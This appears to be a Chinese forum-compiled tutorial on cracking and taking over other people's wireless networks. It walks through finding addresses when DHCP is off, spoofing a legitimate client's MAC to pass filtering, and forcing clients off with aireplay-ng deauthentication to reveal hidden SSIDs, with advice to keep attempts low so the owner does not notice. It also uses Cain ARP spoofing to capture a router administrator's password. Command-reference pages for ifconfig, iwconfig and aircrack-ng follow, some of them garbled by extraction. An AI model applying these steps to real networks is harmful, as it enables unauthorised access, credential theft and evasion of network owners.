原文:教你如何破解 DHCP 关闭的 AP‐‐参赛帖  地址:http://www.anywlan.com/bbs/viewthread.php?tid=8344  作者:james_kor    论坛上翻了一下,好像不太有关于破解 AP 后对方未开启 DHCP,取不到 IP 该怎么办的 帖子,很多只是说用 ap 默认的地址尝试,但如果碰到 192.168.100.100 这种的估计没人会想 得到,本人最近参考了一些资料,尝试了一些方法,可以解决此问题。    1.首先破解此 AP 的连接密码(具体可参考论坛的其他帖子)  2.windows 下载安装“科来网络分析系统”http://www.colasoft.com.cn/download/capsatech.exe, 并在安装过程中按照其提示注册激活(激活后免费使用)  3.确定该 AP 此时正有合法客户端活动(用 BT3 等监听) ,系统切换到 windows,通过刚才得 到的密码用无线连上该 AP, 网卡的网络地址可以随便手动设为 192.168.0.222, 192.168.1.234 等类似网址 

Anywhere WLAN!! 

 

34 

 

 

中国无线门户 

4.启动科来网络分析系统,点击适配器选择相应无线网卡,确定,点击开始采集,采集一定 数据后,此时在窗口左边节点浏览器中展开“按 IP 端点浏览”‐“本地子网”,网段和子网就能 看到了(那个 192.168.0.0/24 中的 24 应该是子网掩码了,24 就是 3 个 255 了,可以算出来 的)  编者注:24 是指 24 位 1,也即是 3 个 255(255.255.255=11111111.11111111.11111111)  5.关于网关,有人说可以查看流量最大的那个 ip,但我试了一下没看出来,我是安装了一个 叫 cain 的软件,或者其他局域网扫描软件应该也行但 cain 能直接显示网关,先将网卡的 IP 和子网掩码设好,然后扫描整个网段,cain 网上有视频教程可以搜一下,一般所有在线的机 器就都显示出来了,右边*最多的那个就是网关了   

 

Anywhere WLAN!! 

 

35 

 

 

中国无线门户 

刚才看见局域网扫描工具科莱自带的,在工具里面‐mac 地址扫描[em01]   

   
Anywhere WLAN!!    36 

 

 

中国无线门户 

三、MAC 过滤 
如果 AP 设置了 MAC 过滤, 我们只要将自已的无线网卡 MAC 地址改为合法的 MAC 地址 即可。Anywlan 为用户提供了多种 MAC 修改工具,请到如下地址下载:  http://www.anywlan.com/Soft/2008/685.html  什么是合法的 MAC 地址,可以理解为合法客户端的 MAC 地址就是合法的。    方法 1:airodump‐ng 和 Kismet  获取合法客户端的 MAC 地址,有许多种方法。我们可用 Kismet、AiroPeek、OmniPeek 等软件得到。虽然 OmniPeek 运行在 Windows 下,但它却挑网卡,所以本方法介绍 BT3 下的 airodump‐ng 和 Kismet 来获取合法 MAC。  其实非常简单,我们在手动破解密码时,在输入 Airodump‐ng 命令时如果有客户端存在 就能得到合法的 MAC 了。如下图: 

  Kismet 可以自动统计当前与目标 AP 通信的主机的 MAC 地址,AiroPeek 则可以将目标 AP 所有的数据包嗅探到。 得到合法的 MAC 地址后, 将自己的网卡 MAC 地址改成合法的 MAC 地址,然后尝试连接 WLAN。  得到合法 MAC 后,用 MAC 修改工具修改即可。   

方法 2:  撰文:杨哲  / Christopher Yang [ZerOne]  原址:http://www.anywlan.com/bbs/viewthread.php?tid=13318  (注:本文详细内容已放置在《无线网络安全攻防实战》一书中,2008 年 10 月下旬全国书 店上架,谢谢支持)   
对于无线网络管理员来说,启用 MAC 地址过滤,可以阻止未经授权的无线客户端访问 AP 及进入内网,这确实可以阻止一部分恶意的攻击行为。不过,单纯地依靠 MAC 地址过滤 来阻止攻击者是不可靠的。 
Anywhere WLAN!!    37 

 

 

中国无线门户 

下图为在 DLink‐624 无线路由器中配置 MAC 地址过滤,出现在下面 MAC 地址过滤列表 里的网卡才被允许连接该无线路由器。 

                而未被授权的客户端,无论是通过有线还是无线的方式,都无法访问无线路由器, 会弹出“无法显示网页”的错误提示。那么,无线攻击者是如何突破无线接入点 MAC 地址 过滤的?其步骤示意图如下: 

    下面我就以上四个步骤按小节方式分别讲述一下实现方法。  1.  获得合法无线客户端 MAC 

Anywhere WLAN!! 

 

38 

 

 

中国无线门户 

        Windows 下可以使用 OmniPeek、Wireshark、Ethereal、Aircrack‐ng for Windows 等工具 实现对客户端 MAC 的拦截,Linux 可用 Kismet、Aircrack‐ng 中的 airodump‐ng 等来实现。需 要注意的是,若目标网络采用 WEP 或者 WPA 加密的话,有时需先行破解再对数据包解密方 可看到客户端 MAC。如下图:

    2.更改 MAC 来伪造身份  在 Windows 下:  方法 1:如果你足够幸运,也许不需要太复杂的方法就可以修改无线网卡 MAC,前提是你的 无线网卡驱动携带了这项功能。 可以通过在对应的无线网卡的属性选择网卡配置‐‐‐高级来查 看,若出现“Locally Administered MAC Address”,即可在右侧位置输入预伪造的 MAC,确定 即可。如下图: 

Anywhere WLAN!! 

 

39 

 

 

中国无线门户 

  方法 2:虽然通过修改注册表中的相关键值,也可以达到修改 MAC 的目的,但很多时候, 使用这款来自台湾的专业 MAC 修改工具 SMAC 会更有效率。  SMAC 是一个强大的也是一个易于使用的和直观的 Windows MAC 地址修改应用软件,它允 许用户为在 Windows 2000、XP 和  2003 Server 系统上的几乎任何的 NIC 转换 MAC 地址,而 不管这些 NIC 产品是否允许修改。呵呵,经我测试,不仅支持有线网卡,还支持无线网卡, 甚至蓝牙设备地址的修改。实为不可多得的利器。  官方网站:www.klcconsulting.net 

Anywhere WLAN!! 

 

40 

 

 

中国无线门户 

  在 Linux 下:  方法 1:可以直接使用自带的 ifconfig 命令来简单实现 MAC 地址的修改,命令如下  ifconfig      eth1      hw      ether          00:0D:13:01:1E:3A  参数解释:  eth1    此为要修改的网卡  hw      ether <MAC>      后跟要修改成的 MAC    方法 2:也可以使用 macchanger.pl 实现,在 BackTrack2 Linux 下默认已经安装。例如你的无 线网卡是 rausb0,其 MAC 地址可以通过 ifconfig 来查看,而假设要虚构的网卡 MAC 地址为  00:11:22:33:44:55,则输入命令如下。  macchanger    ‐m      00:11:22:33:44:55    rausb0  或者  macchanger    ‐‐mac=00:11:22:33:44:55      rausb0    3.重新装载无线网卡  关于 Linux Shell 下的操作可以参考前面的帖子。    4.连接无线接入点  Windows 及 Linux 下的连接方式将另帖撰述。 

四、SSID 有关 
(一) 隐藏 SSID   
Anywhere WLAN!!    41 

 

 

中国无线门户 

1. 方法 1 使用 WildPackets OmniPeek 破解隐藏 SSID 教程  撰文:Tange    WildPackets OmniPeek 下载地址:http://www.anywlan.com/bbs/viewthread.php?tid=12999    1) 打开 OmniPeek,新建一个捕捉,在监控选项中设置无线网络扫描的相关参数: 

  先选择无线网卡,注意查看下方的 WildPackets API,如果为否则表示您的无线网卡不被 OmmiPeek 支持。  2) 802.11 选项里选择 AP 使用的频道, 可以有效减少无谓的数据包。 在这里我选择信道 1。 读者也可以按 BSSID 等选项来过滤数据包。 

Anywhere WLAN!! 

 

42 

 

 

中国无线门户 

  如果知道密码的话,可以在“编辑密钥集”中添加相应的密码。这步实际上可以忽略的。 

    3)   确定完成选项设置,出来下图,点击右上角的“开始捕捉” 。 

Anywhere WLAN!! 

 

43 

 

 

中国无线门户 

  4) 在左侧“无线”选项卡里选择“WLAN” : 

  上图红色大圆中“ESSID 未知”即是隐藏的 SSID,现在是看不到的。   

Anywhere WLAN!! 

 

44 

 

 

中国无线门户 

5)  

静待 OmmiPeek 侦测数据包,当有客户端连接时即可以找到 SSID 了,如下图: 

    使用 OmmiPeek 破解隐藏 SSID 相对比较简单,但局限很大,一定要有客户端连接 AP 时才能捕获到。     

方法 2:  作者:liangyi110  收录进本文时有修改。  首先这个绝对要有客户端, 我们使用 airdump‐ng –a 查看 AP。 命令打完后得到如下图片: 

Anywhere WLAN!! 

 

45 

 

 

中国无线门户 

  看 ESSID    这个在 BT3 下就是隐藏了 ESSID 名称的。看下张图  编者注:命令格式为 aireplay‐ng ‐0 10 –a AP’MAC –c  客户端’Mac  无线网卡号  在此的 aireplay-ng 使用-0 攻击模式,迫使客户端重新连接 AP,这样就可以获取 SSID。10 是攻击次数,不要太高哦,太多人家容易发觉。

  用 aireplay‐ng  –0  断开客户端与主机连接。后就可以显示 ESSID 了。可以打几次命令或者把 断开次数增多。 下就不用 kismet 了, BT3 这个比 kismet 方便, 破解的时候就同时有了 ESSID。
  46 

Anywhere WLAN!! 

 

 

中国无线门户 

接下来破解密码吧,这个相信大家都会吧!破解出密码后打开 

  点更改首选网络的顺序后点添加: 

  输入 SSID  选好网络身份验证  加密方式    及破解出来的密码  勾上“即使此网络未广播也进 行连接” 。然后确定就看到右下角小电脑摇起来了吧! 

Anywhere WLAN!! 

 

47 

 

 

中国无线门户 

编者注:此功能需要安装 XP SP3。    比较:仔细比较上述两种方法,获取隐藏 SSID 的原理都是一样的——在客户端连接 AP 时获 取 SSID。方法 1 是被动式接受,效率很低,因为您很难知道客户端何时会连接 AP;而方法 2 是主动式获取,只有存在合法的客户端,利用‐0 攻击迫使客户端重新连接 AP。    (二) 中文 SSID    通常情况下在破解时可以不输入 ESSID 的值。    (三) 含空格 SSID  方法 1:使用 SnoopWEP 等自动破解工具自动识别;  方法 2:在 SHELL 输入命令时,将 SSID 用””(双引号)标识。或者不输入 SSID 值。   

批注 [tsh1]:  

六、破解路由器密码 
原文:我的 WAR‐Drive 经历  (本文为 2007 年 Anywlan 原创奖励唯一 A+作品)  原址:http://www.anywlan.com/bbs/viewthread.php?tid=7503  作者:Visge    如果你不满足于蹭别人的 WLAN 上网,还想获得更高权限的话,你可以使用 Cain 这款 软件。首先点击配置窗口,选择要嗅探的网卡,当然前提是你安装了 Win_pcap 驱动。然后 选择嗅探任务, 点下方黄色的 ARP 图标, 进入 ARP 窗口。 点击左上角黄色的图标开始嗅探, 在右边上方很大的框中任意点击一下,再点十字图标,在弹出的对话框中左边选择网关,右 边选择你要欺骗的 IP,最后再点确定。当一切设置好后你就开着电脑,运行 Cain,乖乖地等 待管理员登录吧,只要管理员登录了路由器,Cain 就会自动捕捉到管理员登录帐号和密码。 选中下方的获取密码菜单,即可清楚地看到管理员刚才登录的帐号和密码。 

 
Anywhere WLAN!!    48 

 

 

中国无线门户 

  成功得到管理员权限后你是不是该画张网络拓扑图以作纪念呢?这就你需要用到 tracert 命令,查看数据包在传送过程中所经历的路径。打开运行窗口,输入 cmd,再运行 tracert www.baidu.com,执行结果如下: 

    我们可以看到第一跳是跳到 192.168.0.190,然后才跳到公网并出去的,由此证明 192.168.0.190 是网关。到此为止,这个无线网路基本上被我们占有了。       

Anywhere WLAN!! 

 

49 

 

 

中国无线门户 

 

第三章    WEP 破解技巧与常见问题整理 
  1. 开放式跟共享式有什么区别?  区别在于 802.11 的 auth 阶段不同,其它都一样。具体表现是在 aireplay 的‐1 攻击中, 开放的话可以直接用‐1,但是共享的话就不行,必须得事先获得一个合法的 xor 文件。  ——解答:Bestgo  2. AP 与有无客户端的解释说明 

  这是使用 airodump‐ng 命令所得图(图来自论坛) ,实际上分为两个表格,上面是扫描到的 AP 及 AP 的详细信息,我们破解前先要知道 AP 的 MAC 地址(BSSID)及频道(CH) 。  下面的表格是所捕获的客户端,如上图,如果 AP 的 MAC 是 00:19:E0:31:66:56,如果在下面 表格中有出现则表示有客户端,STATION 就是客户端的 MAC 地址了。有了客户端,就没有 破解不了的 WEP 啦。  3. 如何打开 Shell?  进入 BT3 图形界面后,在屏幕左下角,第二个电脑图标 即是 Shell 的快捷方式。点击 即可打开,Shell 可以打开多个。Shell 类似于 Windows 的命令提示符。 

  4.        

 

Anywhere WLAN!! 

 

50 

 

 

中国无线门户 

                       

第四章    破解命令全解 

Anywhere WLAN!! 

 

51 

 

中国无线门户  线

一、 破解所 所涉及命 命令的参数 数的说明 明及常用 用说明 
作者 者:hzpyj  原址 址:http://ww ww.anywlan.c com/bbs/view wthread.php?tid=7997      在前面:  写在 尚缺 缺的部分为用 用词义较难表 表达及没有合理或经验证的 的。    参数说明  一、IFCONFIG 参

    能说明:ifcon 可设置网 nfig 网络设备的状 状态,或是显 显示目前的设 设备。 功能 参数 数说明: <int terface> 说明 明:指定网络 络设备的名称 称 d [add <地址>] 说明 明:设置网络 络设备 IPv6 的 IP 地址。 [del <地址>] 说明 明:删除网络 络设备 IPv6 的 IP 地址。 oadcast <地 地址>] [-bro 说明 明:将要送往 往指定地址的 的数据包当成 成广播数据包 包来处理 ointopoint <地 地址>] [-po 说明 明:与指定地 地址的网络设 设备建立直接 接连线,此模 模式具有保密功能

Anyw where WLAN!! 

52 

 

 

中国无线门户 

[netmask<子网掩码>] 说明:设置网络设备的子网掩码 [dstadder<地址>] 说明:为 ppp 连接设置远程 ip,现在已经不使用了,用 pointopoint 关键字代替 [tunnel<地址>] 说明:建立 IPv4 与 IPv6 之间的隧道通信地址 [hw <网络设备类型> <硬件地址>] 说明:设置网络设备的类型与硬件地址 [metric<数目>] 说明:指定在计算数据包的转送次数时,所要加上的数目 [mtu<字节>] 说明:设置网络设备的 MTU [-trailers] 说明:开或关闭跟踪器。目前在某些 Linux 系统中还无法实现此功能。在 redhat 里使用 man ifconfig 命令好象没有找到相关的注释 [-arp] 说明:这个选项专用于以太网或包广播之类的广播网络。它启用 ARP(地址解析协议)来 保护网络上各台主机的物理地址。对广播网来说,默认设置是" on"(开) [-allmulti] 说明:打开或关闭“所有多播”模式,如果选择这一相,则此接口能接受网络上所有的多 播包, (多播地址即是向不在同一个子网上的一组主机广播数据) [multicast] 说明:在此接口上设置“多播”标志,此操作不是必须的,因为网卡驱动已经设置了正确 的值。 [-promisc] 说明:关闭或启动指定网络设备的 promiscuous 模式 [mem_start<内存地址>] 说明:设置网络设备在主内存所占用的起始地址 [io_addr<I/O 地址>] 说明:设置网络设备的 I/O 地址。 [irq<IRQ 地址>] 说明:设置网络设备的 IRQ

Anywhere WLAN!! 

 

53 

 

 

中国无线门户 

[media<网络媒介类型>] 说明:设置网络设备的媒介类型 [up|down] 说明:up(激活)/ down(终止)指定的网络设备。 ifconfig 使用说明: 1、查看网络接口状态; ifconfig 如果不接任何参数,就会输出当前网络接口的情况。 输入命令: Ifconfig <回车> 回显部分: eth0 Link encap:Ethernet HWaddr 01:D0:43:88:60:1E inet addr:10.0.0.88 Bcast:10.0.0.65 Mask:255.255.255.0 inet6 addr: fe80::2c0:9fff:fe94:780e/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:850 errors:0 dropped:0 overruns:0 frame:0 TX packets:628 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:369135 (360.4 KiB) TX bytes:75945 (74.1 KiB) Interrupt:10 Base address:0x3000 Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:57 errors:0 dropped:0 overruns:0 frame:0 TX packets:57 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:8121 (7.9 KiB) TX bytes:8121 (7.9 KiB) 解释说明:  ⑴  eth0  表示第一块网卡,其中  HWaddr  表示网卡的物理地址,可以看到目前这个网卡的 物理地址(MAC 地址)是  01:D0:43:88:60:1E  ;  ⑵  inet  addr  用来表示网卡的 IP 地址,此网卡的  IP 地址是  10.0.0.88,广播地址,  Bcast:  10.0.0.65,掩码地址 Mask:255.255.255.0    ⑶  lo  是表示主机的回环地址.    如想知道主机所有网络接口的情况,输入下面的命令;  ifconfig ‐a  如想查看某个端口,比如查看 eth0  的状态,就输入下面的方法;  ifconfig eth0   2、调试 eth0 网卡的地址
  54 

lo

Anywhere WLAN!! 

 

中国无线 线门户 

输入 入命令: ifco onfig eth0 down<回车> > ifco onfig eth0 10.0.0.100 broadcast 10.0.0.65 netmask 25 0 55.255.255.0<回车> ifco onfig eth0 up<回车> ifco onfig eth0< <回车> 回显 显部分: eth0 Link enca 0 ap:Ethernet HWaddr 00:11:00:00:1 t 11:11 inet addr:10.0 t 0.0.100 Bcast:10.0.0.6 Mask:255 65 5.255.255.0 0 UP B BROADCAST M MULTICAST MT TU:1500 Met tric:1 RX p packets:0 e errors:0 dropped:0 ove erruns:0 fr rame:0 TX p packets:0 e errors:0 dropped:0 ove erruns:0 ca arrier:0 coll lisions:0 t txqueuelen:1000 RX b bytes:0 (0.0 b) TX bytes:0 (0.0 b) Inte errupt:11 B Base address:0x3400 解释 释说明:  第一 一行:ifconfig g eth0 down  表示如果 et 是激活的 th0 的,就把它 DOWN 掉。 第二 二行:用 ifcon 来配置 eth0 的 IP 地 nfig  地址、广播地 地址和网络掩 掩码;  第三 三行:用 ifcon nfig eth0 up  来激活 eth0 ;  0  第四 四行:用  ifco onfig eth0  来查看  eth0 的 来 的状态;    3、激 激活和终止网 网络接口的连 连接:  激活 活和终止网络 络接口的用  if fconfig  命令,后面接网络 络接口,然后 后加上  down 或 up 参数,就 n 可以 以禁止或激活 活相应的网络 络接口了。  输入 入命令:  ifcon nfig eth0 dow wn<回车> ——终止 ifcon nfig eth0 up<回车> ——激活 —   参数说明  二、IWCONFIG 参

    能说明:iwco onfig 可以对无 无线网卡的大 大部分参数进 进行配置。 功能

Anyw where WLAN!! 

55 

 

 

中国无线门户 

  输入命令:iwconfig eth0 回显部分: eth0 IEEE 802.11-DS ESSID:"Good" Mode:Managed Frequency:2.442GHz Access Point: 00:88:50:71:00:F2 Bit Rate:54Mb/s Tx-Power=20 dBm Sensitivity=0/65535 Retry limit:16 RTS thr:off Fragment thr:off Power Management:off Link Quality:25/10 Signal level:-51 dBm Noise level:-101 dBm Rx invalid nwid:5801 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:237 Invalid misc:256282 Missed beacon:74  参数说明: <interface> 说明:指定网络设备的名称 [essid {NN | on | off}] 说明:essid:设置无线网卡的 ESSID。 通过 ESSID 来区分不同的无线网络, 正常情况下只有相同 ESSID 的无线站点才可以互 相通讯, 除非想监听无线网络。 其后的参数为双引号括起的 ESSID 字符串, 或者是 NN/on/off, 如果 ESSID 字符串中包含 NN/on/off,则需要在前面加"--"。 示例: iwconfig eth0 essid any iwconfig eth0 essid "My Network" iwconfig eth0 essid -- "ANY"

允许任何 ESSID,也就是混杂模式 设置 ESSID 为"My Network" 设置 ESSID 为"ANY"

[nwid {NN | on | off}] 说明:Nwid:Network ID,只用于 pre-802.11 的无线网卡,802.11 网卡利用 ESSID 和 AP 的 MAC 地址来替换 nwid,现在基本上不用设置。 [mode {managed|ad‐hoc|...}  说明:mode:设置无线网卡的工作模式。             Managed:通过多个 AP 组成的网络,无线设备可以在这个网络中漫游  Ad‐hoc:不带 AP 的点对点无线网络           Master:设置该无线网卡为一个 AP           Repeater:设置为无线网络中继设备,可以转发网络包           Secondary:设置为备份的 AP/Repeater           Monitor:监听模式           Auto:由无线网卡自动选择工作模式                        示例:               iwconfig eth0 mode Managed               iwconfig eth0 mode Ad‐Hoc 
Anywhere WLAN!!    56 

 

 

中国无线门户 

[freq N.NNNN[k | M | G]] 说明:freq/channel:设置无线网卡的工作频率或者频道,小于 1000 的参数被认为是频道, 大于 10000 的参数被认为是频率。频率单位为 Hz,可以在数字后面附带 k, M, G 来改变数量 级,比如 2.4G。频道从 1 开始。参数 off/auto 指示无线网络自动挑选频率。            注意:如果是 Managed 模式,AP 会指示无线网卡的工作频率,因此该设置的参数会被 忽略。Ad‐hoc 模式下只使用该设定的频率初始无线网络,如果加入已经存在的 Ad‐hoc 网络 则会忽略该设置的频率参数。            示例:             iwconfig eth0 freq 2422000000             iwconfig eth0 freq 2.422G             [channel N] 说明:channel:网卡工作频道设置。  示例: iwconfig eth0 channel 3    [ap {N | off | auto}] 说明:ap:连接到指定的 AP 或者无线网络,后面的参数可以是 AP 的 MAC 地址,也可以是 标识符。如果是 Ad‐hoc,则连接到一个已经存在的 Ad‐hoc 网络。  off:让无线网卡不改变当前已连接的 AP,进入自动模式。  auto,无线网卡自动选择最好的 AP。           注意:如果无线信号低到一定程度,无线网络会进入自动选择 AP 模式。           示例:             iwconfig eth0 ap 00:60:1D:01:23:45             iwconfig eth0 ap any             iwconfig eth0 ap off   [sens N]  说明:sens:设置接收灵敏度的下限,在该下限之下,无线网卡认为该无线网络信号太差, 不同的网卡会采取不同的措施,一些网卡会自动选择新的 AP。  N:正的参数为 raw  data,直接传给无线网卡驱动处理,一般认为是百分比。负值表示 dBm 值。      示例:  iwconfig eth0 sens ‐80  iwconfig eth0 sens 2  [nick N] 说明:nick: Nickname,802.11 协议栈、MAC 都没有用到该参数,一般也不用设置。 [rate {N | auto | fixed}] 说明:rate/bit:如果无线网卡支持多速率,则可以通过该命令设置工作的速率。小于 1000 的参数由具体的无线网卡驱动定义,一般是传输速率的索引值,大于 1000 的为速率,单位 bps,可以在数字后面附带 k, M, G 来指定数量级。

Anywhere WLAN!! 

 

57 

 

 

中国无线门户 

Auto:让无线网卡自动选择速率。 Fixed:让无线网卡不使用自动速率模式。 示例: iwconfig eth0 rate 11M iwconfig eth0 rate auto iwconfig eth0 rate 5.5M auto //自动选择 5.5M 以下的速率 [rts {N|auto | fixed | off}] 说明:rts:指定 RTS/CTS 握手方式,使用 RTS/CTS 握手会增加额外开销,但如果无线网 络中有隐藏无线节点或者有很多无线节点时可以提高性能。 后面的参数指定一个使用该机制 的 最 小 包 的大 小 , 如 果该 值 等 于 最大 包 大 小 ,则 相 当 于 禁止 使 用 该 机 制 。 可 以 使用 auto/off/fixed 参数。 示例: iwconfig eth0 rts 250 iwconfig eth0 rts off [frag {N | auto | fixed | off}] 说明:frag:设置发送数据包的分片大小。设置分片会增加额外开销,但在噪声环境下可以 提高数据包的到达率。一般情况下该参数小于最大包 大小, 有些支持 Burst 模式的无线网卡可以设置大于最大包大小的值来允许 Burst 模式。 还可以使用 auto/fixed/off 参数。 示例: iwconfig eth0 frag 512 iwconfig eth0 frag off [enc {NNNN-NNNN | off}] 说明:设置无线网卡使用的加密密钥,此处为设置 WEP 模式的加密 key,如果要使用 WPA,需要 wpa_supplicant 工具包。 密钥参数可以是 XXXX-XXXX-XXXX-XXXX 或者 XXXXXXXX 格式的十六 进制数值,也可以是 s:xxxxxx 的 ASCII 字符。如果在密钥参数之前加了[index],则 只是设置该索引值对应的密钥,并不改变当前的密钥。直接指定[index]值可以设置当前 使用哪一个密钥。指定 on/off 可以控制是否使用加密模式。open/restricted 指定加 密模式,取决于不同的无线网卡,大多数无线网卡的 open 模式不使用加密且允许接收没 有加密的数据包,restricted 模式使用加密。可以使用多个 key 参数,但只有最后一个 生效。 WEP 密钥可以是 40bit,用 10 个十六进制数字或者 5 个 ASCII 字符表示, 也可以是 128bit,用 26 个十六进制数字或者 13 个 ASCII 字符表示。 [power {period N | timeout N}] 说明:power:设置无线网卡的电源管理模式。  period ‘value’  指定唤醒的周期,  timeout  ‘value’指定进入休眠的等待时间,这两个参数之前可以加 min 和 max 修饰, 这些值的单位为秒,可以附加 m 和 u 来指定毫秒和微秒。            示例: 
  58 

Anywhere WLAN!! 

 

 

中国无线门户 

          iwconfig eth0 power period 2            iwconfig eth0 power timeout 300u all  [retry {limit N | lifetime N}] 说明:retry:设置无线网卡的重传机制。  limit ‘value’  指定最大重传次数;  lifetime  ‘value’指定最长重试时间,单位为秒,可以附带 m 和 u 来指定单位为毫秒和 微秒。  如果无线网卡支持自动模式,则在 limit 和 lifetime 之前还可以附加 min 和 max 来指 定上下限值。            示例:            iwconfig eth0 retry 16            iwconfig eth0 retry lifetime 300m            iwconfig eth0 retry min limit 8  [txpower N {mW | dBm}] 说明: txpower: 如果无线网卡支持多发射功率设定, 则使用该参数设定发射, 单位为 dBm, 如果指定为 W(毫瓦) ,只转换公式为:dBm=30+log(W)。           示例:            iwconfig eth0 txpower 15            iwconfig eth0 txpower 30mW  [commit] 说明:commit:提交所有的参数修改给无线网卡驱动。一般不需要使用该命令。 三、AirCrack‐NG Suite 参数说明  AirCrack‐NG  是一個相当完整的无线网络攻击工具組,不但可以利用來做  WEP  加密密 码的破解,也可以做  WPA‐PSK  密码的字典攻击。AirCrack‐NG  不但有  Linux  版本,还有  Windows  版本,另外也有人写了 Windows AirCrack  的  GUI  程序,叫做  WinAirCrack,搭配  AirCrack‐NG 的使用。 Linux  版的  AirCrack‐NG  提供的工具较为完整, 包含了以下的几个程序:    • Airodump‐ng:802.11  数据包截取程序  • Aireplay‐ng:802.11  数据包注入程序  • Aircrack‐ng:WEP  及  WPA‐PSK key  破解主程序  • Airdecap‐ng:WEP/WPA  数据包解密程序  • Airmon‐ng:802.11  网络监听程序  • Packetforge‐ng:802.11  数据包制造程序  • Airtun‐ng:802.11  加密数据包集及数据包注入程序  不同于早期被动的收集数据包,AirCrack‐NG  在  WEP  加密密码的破解,可以采取更主 动的数据包注入的方式,制造伪造的  ARP  Request  的数据包,使得  AP  回应请求,而发出  ARP Reply  的数据包,而当  AP  发出回应数据包时,黑客就可以收集更多的“IV  值” ,加速  WEP  加密密码的破解,以一个  128 Bits  的 Key,可能在三十分钟之內被破解。    1、airodump‐ng 参数说明 

Anywhere WLAN!! 

 

59 

 

中国无线门户  线

  程序 序选项:  [‐‐ivs s]  说明 明:仅保存 IV VS(WEP 包) )    [‐‐gp psd]  说明 明:使用  GPS (不使用 SD  用)    [‐‐write]  明:将抓包文 文件进行实时 时写入保存  说明   [‐‐w]  明:写入文件 件,等同‐writ 参数  te 说明
60 

Anyw where WLAN!! 

 

 

中国无线门户 

  [‐‐beacons]  说明:记录抓包文件里的所有的 beacon    过滤选项:  [‐‐encrypt]  说明:通过加密方式过滤    [‐‐netmask]  说明:通过子网淹码过滤      [‐‐bssid]  说明:通过 BSSID 过滤      [‐a]  说明:通过未连接客户端过滤    2、aireplay‐ng  参数说明 

Anywhere WLAN!! 

 

61 

 

中国无线门户  线

  过滤 滤选项:  [‐b d dssid]  说明 明:过滤侵入 MAC 地址 入的 址    [‐d d dmac〕  说明 明:过滤目标 MAC  地址 标的 址   

Anyw where WLAN!! 

62 

 

 

中国无线门户 

[‐s dmac]  说明:过滤目标源 MAC  地址    [‐m len]  说明:过滤最小的包大小    [‐n len]  说明:过滤最大的包大小    [‐u type]  说明:过滤含关键词的控制帧    [‐v subt]  说明:过滤含表单数据的控制帧    [‐t tods]  说明:过滤到目的地址的控制帧    [‐f fromds]  说明:过滤从目的地址发出的控制帧  [‐w lswep]  说明:过滤含 WEP 数据的控制帧    注入选项:  [‐x nbpps]  说明:定义每秒发送的数据包数量    [‐p fctrl]  说明:设置控制帧中包含的信息(16 进制)    [‐a bssid]:  说明:设置被侵入的 AP 的 MAC 地址    [‐c dmac]  说明:设置目标的 MAC 地址    [‐h smac]  说明:设置监测到的客户端 MAC 地址或伪造的 MAC 地址    [‐e esid]  说明:虚假认证攻击:设置 AP 的 ESSID    [‐j]  说明:ARP 请求攻击:向目标注入数据包 

Anywhere WLAN!! 

 

63 

 

 

中国无线门户 

  [‐g value]  说明:修改缓冲区大小(缺省为 8)    [‐k IP]  说明:设置目标 IP 加入注入文件    [‐l IP]  说明:设置目标源 IP 加入注入文件    [‐o npckts]  说明:每次攻击含数据包的数量    [‐q sec]  说明:设置持续活动的时间(秒)    [‐y prga]  说明:包含共享密钥认证的关键数据流   源选项:  [‐i iface]  说明:从指定网卡获取数据包    [‐r file]  说明:从指定包文件提取数据包    攻击模式:  [‐0]\[‐‐deauth ]  说明:冲突模式,使认证的客户端断线重连,后面跟攻击次数。    [‐1]\[‐‐fakeauth count]:  说明:采用虚假认证模式,后面跟延时    [‐2]\[interactive]:  说明:交互模式    [‐3]\[arpreplay]:  说明:采用 Arp 注入攻击模式    [‐4]\[chopchop]:  说明:解密 WEP 包    [‐5]\[fragment]  说明:碎片包攻击模式

Anywhere WLAN!! 

 

64 

 

 

中国无线门户 

  公用选项:  ‐l:不要去除 802.11 头  ‐b:接入点的 mac 地址  ‐e:目标网络的 SSID

WPA 具体方法: -p:目标网络的 WPA 密码 -k:WPA 成对万能钥匙在十六进制     

   

Anywhere WLAN!! 

 

65 

 

 

中国无线门户 

  ‐x nbpps                                :每秒数据包数目(默认值 100)  ‐a bssid                                  :设置 AP 的 MAC 地址  ‐i iface                                    :从这个接口抓包  ‐y file                                      :从这个文件读取 PRGA  ‐w wepkey                              :用 WEP‐KEY  加密数据包  ‐t tods                                      :发送帧到 AP(1)或 client(0)  ‐r file                                        :从 pcap 文件里读取帧  重复操作选项:  ‐‐repeat                                    :使重复操作模式有效  ‐‐bssid<mac>                          :需要重复使用的 BSSID  … 

  伪造选项:  ‐p <fctrl>                :设置帧控制字(16 进制)  ‐a <bssid>              :设置 AP 的 MAC 地址  ‐c <dmac>              :设置目标 MAC 地址  ‐h <smac>              :设置源 MAC 地址  ‐j                              :设置 fromDS  位 
  66 

Anywhere WLAN!! 

 

 

中国无线门户 

‐o                            :清除 fromDS 位  ‐e                            :关闭 WEP 加密  ‐k <ip[:port]>          :设置目标 ip[端口]  ‐l <ip[:port]>          :设置源 ip[端口]  ‐t <ttl>                    :设置保活时间  ‐w <file>              :指定需要要写入的 pcap 文件(名) 、  ‐s <size>              :指定空数据包的大小  ‐n <packets>        :指定要产生的数据包个数    源选项:  ‐r <file>                :从这个 raw 文件里读取数据包  ‐y <file>                :从这个文件里读取 PRGA  模式:              ‐‐arp                      :伪造一个 arp 包(‐0)              ‐‐udp                      :伪造一个 udp 包(‐1)              ‐‐icmp                    :伪造一个 icmp 包(‐2)              ‐‐null                      :构造一个空包(‐3)              ‐‐custom                :构造一个客户包(‐9)     

二、 aireplay 详述 
